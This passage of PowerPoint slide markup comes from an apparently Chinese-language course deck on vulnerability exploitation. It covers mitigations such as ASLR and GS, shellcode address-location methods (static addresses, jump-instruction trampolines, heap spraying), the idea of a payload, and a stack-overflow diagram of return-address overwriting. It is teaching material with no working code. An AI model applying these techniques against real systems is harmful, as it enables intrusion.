            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="矩形 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC905B59-87C5-FDA1-9A55-B0DBC0DB52BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919535" y="4355792"/>
            <a:ext cx="5111201"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6986F577-00C5-8556-16CC-C9ECE8DEC1B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9271643" y="3937471"/>
            <a:ext cx="115212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702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952796B-7414-2A3B-728D-3B799D949D07}"/>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能有效阻止非代码区的植入的恶意代码执行的技术是</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771DADA0-FCAF-E5F2-4016-358429CFA3F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ASLR</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7987E5E-3101-DBCD-296C-14CB30B9E711}"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A1C12E-EF90-6F08-BF30-B6A61610BF16}"/>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GS</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80EF292-FAB8-EA40-4ECE-5E6EA30BABFD}"/>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5C475839-5AF0-8167-F59B-9E25A061032A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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EE2BF047-0E71-92F4-76C1-B10904299E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>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矩形: 圆角 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DDF1F5-6936-1265-E2F3-854F19B21165}"/>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E9E223AB-F009-2168-4C34-9188B3ACF86E}"/>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22E29767-FF69-ABB5-E3B1-B647A7447268}"/>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89344824-7B37-60B1-1BC5-89194FEC2EA0}"/>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3836B0D6-9E70-7F10-C252-F945FC58E9B9}"/>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8B61C5DF-70B5-60E0-26CC-0A26CCC5728C}"/>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4228FF1F-8FA9-948F-7886-AE2788C6AF2D}"/>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30911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AB43764-E041-9757-36BA-9EB80FCBD27B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1720054"/>
            <a:ext cx="12192000" cy="2376264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0048AA"/>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sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  漏洞利用技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3322619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漏洞利用技术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77832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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全防护</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82303"/>
            <a:ext cx="4824536" cy="753220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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操作系统启用了</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ASLR</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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等漏洞利用的防护技术，使得攻击门槛提高了很多。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="18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漏洞利用技术</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80408"/>
            <a:ext cx="4824536" cy="826573"/>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然而攻击者也在陆续发现着其他的漏洞利用手段，突破最新的防护技术。</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77823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漏洞利用技术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地址定位技术</a:t>
            </a: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根据软件漏洞触发条件的不同，内存给调用函数分配内存的方式不同，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的植入地址也不相同。</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三种定位技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF2FD4A-A54A-A956-6778-56D01CBF1104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6452593" y="1929217"/>
            <a:ext cx="4833540" cy="792310"/>
            <a:chOff x="766764" y="1052513"/>
            <a:chExt cx="10093771" cy="792310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="矩形 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4835DAC-B47F-2A9D-42B6-20A888F4FB48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="151092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40216FC5-70A6-D501-C390-18C86612A9BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2277689" y="1052513"/>
              <a:ext cx="8582846"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静态</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地址的利用技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7B4A2C1-B2B6-C07E-CA3E-CEFBE9C8336B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6447036" y="3033859"/>
            <a:ext cx="4833540" cy="792310"/>
            <a:chOff x="766764" y="1052513"/>
            <a:chExt cx="10093771" cy="792310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="矩形 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4189ADE-D215-F5E9-18C0-F9F352BB0234}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="151092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61FF7BAA-3662-ADD6-1C36-6A7E397C650F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2277689" y="1052513"/>
              <a:ext cx="8582846"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基于跳板指令的地址定位技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B7CEB78-582C-BB22-AD98-5C43AA636B5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6452593" y="4136474"/>
            <a:ext cx="4833540" cy="792310"/>
            <a:chOff x="766764" y="1052513"/>
            <a:chExt cx="10093771" cy="792310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F6FF3EA-2785-53BF-D590-5EC59DF26048}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="151092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A62765D3-C6AB-6B72-3346-B571B6848D25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2277689" y="1052513"/>
              <a:ext cx="8582846"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内存喷洒技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152800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611339"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33504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Payload</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8259"/>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漏洞利用要想达到攻击目标，需要做的工作很多，例如触发漏洞，将控制权转移到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等，这些能实现特定目标的有效载荷，称为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payload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DCB2067A-5DC1-759E-C799-1864F72C41F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917550" y="1708259"/>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现在，</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已经表达的是广义上的植入进程的代码，而不是狭义的仅仅用来获得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的代码。</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5384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静态</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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地址的利用技术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适用情况</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5590"/>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如果存在溢出漏洞的程序，是一个操作系统每次启动都要加载的程序，操作系统启动时为其分配的内存地址一般是固定的，则函数调用时分配的栈帧地址也是固定的。</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方法</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5590"/>
            <a:ext cx="4824536" cy="3134961"/>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这种情况下，溢出后写入栈帧的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代码其内存地址也是静态不变的，所以可以直接将</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代码在栈帧中的静态地址覆盖原有返回地址。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在函数返回时，通过新的返回地址指向</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代码地址，从而执行</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2327581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4C808104-E685-A896-E679-DEC56EDE42F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8198356" y="3481156"/>
            <a:ext cx="1428359" cy="1984591"/>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静态</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>地址的利用技术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5111750" cy="5256212"/>
            <a:chOff x="623888" y="1052513"/>
            <a:chExt cx="5111750" cy="5256212"/>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762518" y="1148219"/>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溢出前</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2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE24154A-88FA-9351-5A13-62C68CE37C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6313488" y="1058913"/>
            <a:ext cx="5111750" cy="5249811"/>
            <a:chOff x="623888" y="1052513"/>
            <a:chExt cx="5111750" cy="5249811"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256161F4-766C-C824-AC32-447B970A69C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="623888" y="10525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767495" y="1141819"/>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溢出后</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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C714A08F-EDEF-36B4-60FF-6E08274042A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676273" y="1938146"/>
            <a:ext cx="1440160" cy="399783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D984D2C6-5074-03E3-572B-AF4914323B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2996243" y="1585109"/>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5" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80775D09-4BA8-98B5-1E7D-31041EFAE426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016781" y="5961804"/>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16" name="直线连接符 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C2485A3-3814-154D-18FB-8BBCA7CAD1AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687541" y="232835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2D7E405-181B-3A6A-F48E-31A704B5CE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229477" y="1905243"/>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5833C90B-3EF3-B5BD-29DE-92327B392AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3045458" y="2359965"/>
            <a:ext cx="7216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n</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9" name="直线连接符 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1684BFF-8E64-40D2-62B1-F1D0D1E5BF00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676271" y="269625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505D0834-4E92-7416-594B-928442AB1F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687541" y="305712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6C00C73E-75FC-D65A-EACB-6C8D529BA78C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687541" y="345025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244AB94-B9C4-A2AF-2626-F342B1A14B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4534060" y="3904588"/>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5" name="直线箭头连接符 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AEC6A0-AA66-DDE4-9BD7-C2CF3A90F27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4266138" y="4065240"/>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EB0ADFC-DB1A-0CF9-CCE0-AEC27F35FC91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532475" y="5597423"/>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7" name="直线箭头连接符 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36871274-E1D6-3F38-FBC5-39BE36A2E5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4264553" y="5758075"/>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4B1BD586-CB16-F3E1-DB2C-9F7B7100D941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676273" y="386802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B3878F3-BAA9-B64D-159A-3E314D59DA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2893648" y="3498865"/>
            <a:ext cx="1005403"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返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7AF53A9-4749-215A-49B4-00A460A882BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940045" y="3904588"/>
            <a:ext cx="926857"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old</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连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8602A362-1993-DC0D-27A2-DA5E2C31232A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687541" y="426779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933081B-5314-7C71-0949-E0A3FDDE3A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2840658" y="4316402"/>
            <a:ext cx="112562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局部变量</a:t>
            </a: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连接符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80999AF-7ED1-3864-7B48-0253D58802C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676270" y="469214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244C621-684A-7A58-95AA-CC6E20E181BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3240748" y="2634006"/>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10EF4CD0-0D53-CC57-2DEF-9B08A5168E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3051146" y="3078404"/>
            <a:ext cx="715260"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4C8172EA-555B-82A7-EA81-D052E2DD617F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228947" y="4682340"/>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9" name="直线连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4421A66D-88E5-EF91-DB57-32D936AA3106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2675740" y="505940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F8D2A63-CFD3-84BE-363A-DD78B03314D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2840658" y="5096290"/>
            <a:ext cx="1132041"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局部变量</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>n</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1" name="直线连接符 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EA7366-130C-EAF9-C5C8-30F9EB792ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687541" y="543484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4A3351FC-2D6E-3C36-4889-8D64A42CEE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187088" y="1969049"/>
            <a:ext cx="1440160" cy="399783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57ABE7C0-7752-BE56-FB2F-D3002D77E1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8507058" y="1616012"/>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44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0EE247-7401-9C18-9209-89E79ABAB0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8527596" y="599270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45" name="直线连接符 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8D88D8-888D-1D18-9E3C-F0DFDF623498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8198356" y="235925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2C5F692-06D6-C494-8E5D-D09470598C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740292" y="1936146"/>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47" name="文本框 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1338A307-B986-C96B-C9A3-F7DD83824943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8556273" y="2390868"/>
            <a:ext cx="7216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n</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8" name="直线连接符 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BB5B5B-E026-8A7F-BDBD-7866F7D8CC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187086" y="272715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B023B2E-7E2D-7CD3-5997-044DB48CBF93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8198356" y="308802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EBC30912-2C27-8A73-97F5-DF752C87A8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
